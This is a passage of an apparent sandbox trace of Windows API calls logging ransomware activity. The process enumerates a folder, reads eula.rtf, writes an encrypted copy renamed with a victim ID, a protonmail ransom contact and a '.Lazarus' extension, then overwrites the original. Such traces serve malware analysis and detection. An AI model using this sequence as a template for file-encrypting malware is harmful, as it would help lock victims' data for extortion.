lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.588] GetLastError () returned 0x5 [0068.588] GetLastError () returned 0x5 [0068.588] SetLastError (dwErrCode=0x5) [0068.588] GetLastError () returned 0x5 [0068.588] SetLastError (dwErrCode=0x5) [0068.588] GetLastError () returned 0x5 [0068.588] SetLastError (dwErrCode=0x5) [0068.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78490 | out: hHeap=0x20000) returned 1 [0068.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0068.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0068.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0068.588] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.588] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.588] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.588] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0068.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0068.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0068.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0068.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0068.588] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="1044", cAlternateFileName="")) returned 1 [0068.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0068.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0068.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0068.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0068.588] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1043\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78410 [0068.588] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.588] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xdda, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0068.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0068.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0068.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0068.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0068.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0068.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0068.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0068.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0068.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46668 [0068.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0068.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0068.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0068.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0068.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0068.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0068.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71a98 [0068.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0068.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0068.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0068.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0068.589] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.589] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.589] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.589] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0068.590] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.590] AreFileApisANSI () returned 1 [0068.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1043\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1043\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0068.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0068.590] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.590] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0068.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0068.590] AreFileApisANSI () returned 1 [0068.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0068.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x693f0 [0068.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x693f0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 36 [0068.590] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.590] GetFileType (hFile=0x410) returned 0x1 [0068.590] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0068.590] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0068.591] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0068.591] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0068.591] CloseHandle (hObject=0x410) returned 1 [0068.591] AreFileApisANSI () returned 1 [0068.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0068.591] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0068.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 36 [0068.591] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.591] GetFileType (hFile=0x410) returned 0x1 [0068.591] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0068.592] CloseHandle (hObject=0x410) returned 1 [0068.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0068.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0068.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0068.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0068.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0068.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0068.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0068.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0068.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0068.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0068.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0068.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0068.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0068.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0068.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0068.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0068.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0068.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0068.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0068.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0068.592] AreFileApisANSI () returned 1 [0068.592] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0068.593] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69490 [0068.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x69490, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 36 [0068.593] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1043\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xdda)) returned 1 [0068.593] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69490 | out: hHeap=0x20000) returned 1 [0068.593] AreFileApisANSI () returned 1 [0068.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0068.593] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0068.593] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0068.593] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0068.593] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0068.593] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0068.593] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0068.593] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0068.593] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0068.593] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0068.594] GetLastError () returned 0x0 [0068.594] SetLastError (dwErrCode=0x0) [0068.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e0a0 [0068.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8c430 [0068.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b798 [0068.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4e0 [0068.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0068.594] GetLastError () returned 0x0 [0068.594] SetLastError (dwErrCode=0x0) [0068.594] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0068.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0068.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x69300 [0068.594] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0068.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76278 [0068.594] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0068.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0068.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0068.594] AreFileApisANSI () returned 1 [0068.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76278, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0068.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc4) returned 0x51398 [0068.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76278, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=98 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1043\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 98 [0068.594] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.596] GetFileType (hFile=0x410) returned 0x1 [0068.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0068.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0068.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0068.597] AreFileApisANSI () returned 1 [0068.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0068.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69490 [0068.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x69490, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 36 [0068.597] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0068.597] GetFileType (hFile=0x420) returned 0x1 [0068.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69490 | out: hHeap=0x20000) returned 1 [0068.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0068.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0068.597] GetLastError () returned 0x0 [0068.597] SetLastError (dwErrCode=0x0) [0068.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0068.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0068.597] GetLastError () returned 0x0 [0068.597] SetLastError (dwErrCode=0x0) [0068.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0068.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0068.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0068.597] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f030*=0xdda, lpOverlapped=0x0) returned 1 [0068.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0068.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d630 [0068.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x85fc0 [0068.703] GetLastError () returned 0x0 [0068.703] SetLastError (dwErrCode=0x0) [0068.703] GetLastError () returned 0x0 [0068.703] SetLastError (dwErrCode=0x0) [0068.703] GetLastError () returned 0x0 [0068.703] SetLastError (dwErrCode=0x0) [0068.703] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0068.704] GetLastError () returned 0x0 [0068.704] SetLastError (dwErrCode=0x0) [0068.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa) returned 0x7d6d8 [0068.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6a8 [0068.704] GetLastError () returned 0x0 [0068.704] SetLastError (dwErrCode=0x0) [0068.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d630 | out: hHeap=0x20000) returned 1 [0068.704] WriteFile (in: hFile=0x410, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0xde0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327ef70*=0xde0, lpOverlapped=0x0) returned 1 [0068.705] GetLastError () returned 0x0 [0068.705] SetLastError (dwErrCode=0x0) [0068.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6d8 | out: hHeap=0x20000) returned 1 [0068.705] GetLastError () returned 0x0 [0068.705] SetLastError (dwErrCode=0x0) [0068.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0068.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0068.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6a8 | out: hHeap=0x20000) returned 1 [0068.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0068.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0068.705] CloseHandle (hObject=0x410) returned 1 [0068.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0068.707] CloseHandle (hObject=0x420) returned 1 [0068.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0068.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0068.707] AreFileApisANSI () returned 1 [0068.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0068.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x693f0 [0068.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x693f0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 36 [0068.707] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0068.708] GetFileType (hFile=0x420) returned 0x1 [0068.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0068.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d648 [0068.708] GetLastError () returned 0xb7 [0068.709] SetLastError (dwErrCode=0xb7) [0068.709] WriteFile (in: hFile=0x420, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, 